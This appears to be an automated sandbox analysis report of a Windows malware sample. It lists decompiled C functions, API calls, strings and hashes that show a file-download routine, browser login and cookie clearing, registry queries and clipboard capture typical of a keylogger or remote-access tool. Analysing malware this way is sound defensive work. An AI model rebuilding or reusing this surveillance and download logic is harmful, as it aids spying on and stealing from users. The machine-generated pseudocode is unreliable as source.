                                         					if(_t24 == 3) {
                                         						/* WM_RBUTTONUP (0x204): show the popup menu at the cursor position */
                                         						GetCursorPos( &_v12);
                                         						SetForegroundWindow(_a4);
                                         						TrackPopupMenu( *0x41c1f0, 0, _v12.x, _v12.y, 0, _a4, 0);
                                         						goto L15;
                                         					}
                                         					_push(_a16);
                                         					_push(_a12);
                                         					_push(0x401);
                                         					L4:
                                         					return DefWindowProcA(_a4, ??, ??, ??);
                                         				}
                                         				/* every other message goes to the default handler */
                                         				_push(_a16);
                                         				_push(_a12);
                                         				_push(_a8);
                                         				goto L4;
                                         			}

                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                        • GetCursorPos.USER32(?), ref: 00413C97
                                        • SetForegroundWindow.USER32(?), ref: 00413CA0
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                        • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                        • ExitProcess.KERNEL32 ref: 00413D14
                                        • CreatePopupMenu.USER32 ref: 00413D1C
                                        • AppendMenuA.USER32 ref: 00413D31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                        • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                        • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                        • API String ID: 2054586871-62392802
                                        • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                        • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                          • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                          • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                          • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                          • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6F60CB60,?,?,0041225E,?), ref: 00412919
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                          • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                          • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                        • String ID: .exe$http\shell\open\command
                                        • API String ID: 2647146128-4091164470
                                        • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                        • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                        • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                        • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 2807017801-0
                                        • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                        • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00401EA7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(Function_0001B310,?,Function_0001B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                        • String ID:
                                        • API String ID: 3851886811-0
                                        • Opcode ID: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                        • Opcode Fuzzy Hash: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
                                        				void* _v8;
                                        				char* _v12;
                                        				void* _v16;
                                        				void _v10016;
                                        				void* _t35;
                                        				void* _t36;
                                        				void* _t42;
                                        				void* _t44;
                                        				void* _t46;
                                        				unsigned int* _t55;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				signed int _t64;
                                        				signed int _t74;
                                        				char* _t98;
                                        				void* _t100;
                                        				void* _t101;
                                        				void* _t102;
                                        				void* _t103;
                                        
                                        				E00413ED0(0x271c, __ecx);
                                        				_t55 = _a12;
                                        				_a15 = _a15 & 0x00000000;
                                        				_t98 = 0;
                                        				 *_a8 = 0;
                                        				 *_t55 = 0;
                                        				_t35 = InternetOpenA("user", 1, 0, 0, 0);
                                        				_v16 = _t35;
                                        				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                        				_v8 = _t36;
                                        				if(_t36 != 0) {
                                        					_a12 = 0;
                                        					_a4 = 0;
                                        					while(1) {
                                        						_t10 =  &_a12; // 0x415664
                                        						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
                                        						if(_t42 != 0 && _a12 <= _t98) {
                                        							break;
                                        						}
                                        						_t44 =  *_t55 + _a12;
                                        						_push(_t44);
                                        						L00413E84();
                                        						_t57 =  *_t55;
                                        						_t100 = _a4;
                                        						_t58 = _t57 >> 2;
                                        						_v12 = memcpy(_t44, _t100, _t58 << 2);
                                        						_push(_a4);
                                        						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
                                        						_t101 =  &_v10016;
                                        						_t64 = _a12 >> 2;
                                        						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
                                        						_t103 = _t103 + 0x30;
                                        						L00413EBE();
                                        						_a4 = _v12;
                                        						 *_t55 =  *_t55 + _a12;
                                        						_t98 = 0;
                                        					}
                                        					_push( *_t55);
                                        					L00413E84();
                                        					_t102 = _a4;
                                        					 *_a8 = _t42;
                                        					_t74 =  *_t55 >> 2;
                                        					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
                                        					_a15 = 1;
                                        				}
                                        				InternetCloseHandle(_v16);
                                        				InternetCloseHandle(_v8);
                                        				return _a15;
                                        			}


                                        0x0041255b
                                        0x00412564
                                        0x00412568
                                        0x0041256c
                                        0x00412573
                                        0x0041257a
                                        0x0041257c
                                        0x0041258d
                                        0x00412591
                                        0x00412599
                                        0x0041259c
                                        0x004125a3
                                        0x004125a6
                                        0x004125a9
                                        0x004125a9
                                        0x004125bc
                                        0x004125c4
                                        0x00000000
                                        0x00000000
                                        0x004125cd
                                        0x004125d0
                                        0x004125d1
                                        0x004125d6
                                        0x004125d8
                                        0x004125df
                                        0x004125e6
                                        0x004125ec
                                        0x004125ef
                                        0x004125fa
                                        0x00412600
                                        0x0041260a
                                        0x0041260a
                                        0x0041260c
                                        0x00412615
                                        0x0041261b
                                        0x0041261e
                                        0x0041261e
                                        0x00412622
                                        0x00412624
                                        0x0041262a
                                        0x00412632
                                        0x00412638
                                        0x00412642
                                        0x00412644
                                        0x00412648
                                        0x00412652
                                        0x00412657
                                        0x0041265f

                                        APIs
                                        • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                        • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                        • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                        • InternetCloseHandle.WININET(?), ref: 00412652
                                        • InternetCloseHandle.WININET(00000000), ref: 00412657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                        • String ID: dVA$user
                                        • API String ID: 3314639739-756348157
                                        • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                        • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E004078BB(void* __ecx) {
                                        				signed int _v5;
                                        				signed int _v6;
                                        				signed int _v7;
                                        				signed int _v8;
                                        				void* _t40;
                                        				void* _t44;
                                        
                                        				_push(__ecx);
                                        				 *0x41b9b8 = 1;
                                        				Sleep( *0x41b9b4);
                                        				_v5 = _v5 & 0x00000000;
                                        				_v6 = _v6 & 0x00000000;
                                        				_v7 = _v7 & 0x00000000;
                                        				_v8 = _v8 & 0x00000000;
                                        				_t44 = 0;
                                        				do {
                                        					if(_v5 == 0) {
                                        						L2:
                                        						_v5 = E00407767();
                                        					}
                                        					if(_v6 == 0) {
                                        						_v6 = E0040751B();
                                        					}
                                        					if(_v8 == 0) {
                                        						_v8 = E0040728F();
                                        					}
                                        					if(_v7 == 0) {
                                        						_v7 = E004071CF();
                                        					}
                                        					if(_t44 == 0) {
                                        						_t44 = E0040710F();
                                        					}
                                        					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
                                        						Sleep(0x1388);
                                        					}
                                        					if(_v5 == 0) {
                                        						goto L2;
                                        					}
                                        				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				E00407A90("\n[Cleared browsers logins and cookies.]\n");
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
                                        				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
                                        				if( *0x41b9b0 != 0) {
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					E0040B829(0x80000001, _t40, "FR", 1);
                                        				}
                                        				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
                                        				return 0;
                                        			}

                                        0x004078be
                                        0x004078cd
                                        0x004078d4
                                        0x004078d6
                                        0x004078da
                                        0x004078de
                                        0x004078e2
                                        0x004078e6
                                        0x004078e8
                                        0x004078ec
                                        0x004078ee
                                        0x004078f3
                                        0x004078f3
                                        0x004078fa
                                        0x00407901
                                        0x00407901
                                        0x00407908
                                        0x0040790f
                                        0x0040790f
                                        0x00407916
                                        0x0040791d
                                        0x0040791d
                                        0x00407922
                                        0x00407929
                                        0x00407929
                                        0x0040792f
                                        0x0040794c
                                        0x0040794c
                                        0x00407952
                                        0x00000000
                                        0x00000000
                                        0x00407954
                                        0x0040797c
                                        0x00407982
                                        0x00407992
                                        0x004079a6
                                        0x004079ac
                                        0x004079bf
                                        0x004079cf
                                        0x004079db
                                        0x004079e9
                                        0x004079f5
                                        0x004079fa
                                        0x004079fd
                                        0x00407a09

                                        APIs
                                        • Sleep.KERNEL32 ref: 004078D4
                                        • Sleep.KERNEL32(00001388), ref: 0040794C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                          • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                          • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                        Strings
                                        • [Cleared browsers logins and cookies.], xrefs: 00407977
                                        • [INFO], xrefs: 004079A1
                                        • Cleared browsers logins and cookies., xrefs: 0040798D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                        • API String ID: 3797260644-945983296
                                        • Opcode ID: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                        • Opcode Fuzzy Hash: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 31%
                                        			E00406C35(void* __ecx) {
                                        				char _v5;
                                        				char _v24;
                                        				char _v40;
                                        				char* _t13;
                                        				void* _t18;
                                        				void* _t34;
                                        
                                        				_t18 = __ecx;
                                        				if(( *0x41b8f8 & 0x00000001) == 0) {
                                        					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                        					E00413E72(E00406CF4);
                                        				}
                                        				E00406BEF(_t18,  &_v24);
                                        				_t13 =  &_v24;
                                        				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
                                        				if(_t13 == 0) {
                                        					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                        					_t13 =  &_v24;
                                        					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
                                        					if(_t13 != 0) {
                                        						L00414176();
                                        						L00414170();
                                        						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                        					}
                                        				}
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t13;
                                        			}
                                        0x00406c45
                                        0x00406c4c
                                        0x00406c4e
                                        0x00406c5b
                                        0x00406c66
                                        0x00406c6b
                                        0x00406c72
                                        0x00406c7c
                                        0x00406c81
                                        0x00406c8b
                                        0x00406c93
                                        0x00406c99
                                        0x00406ca2
                                        0x00406cac
                                        0x00406cc4
                                        0x00406cce
                                        0x00406cd8
                                        0x00406ce0
                                        0x00406ce0
                                        0x00406cac
                                        0x00406ce9
                                        0x00406cf3

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                        Strings
                                        • [End of clipboard text], xrefs: 00406CB8
                                        • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
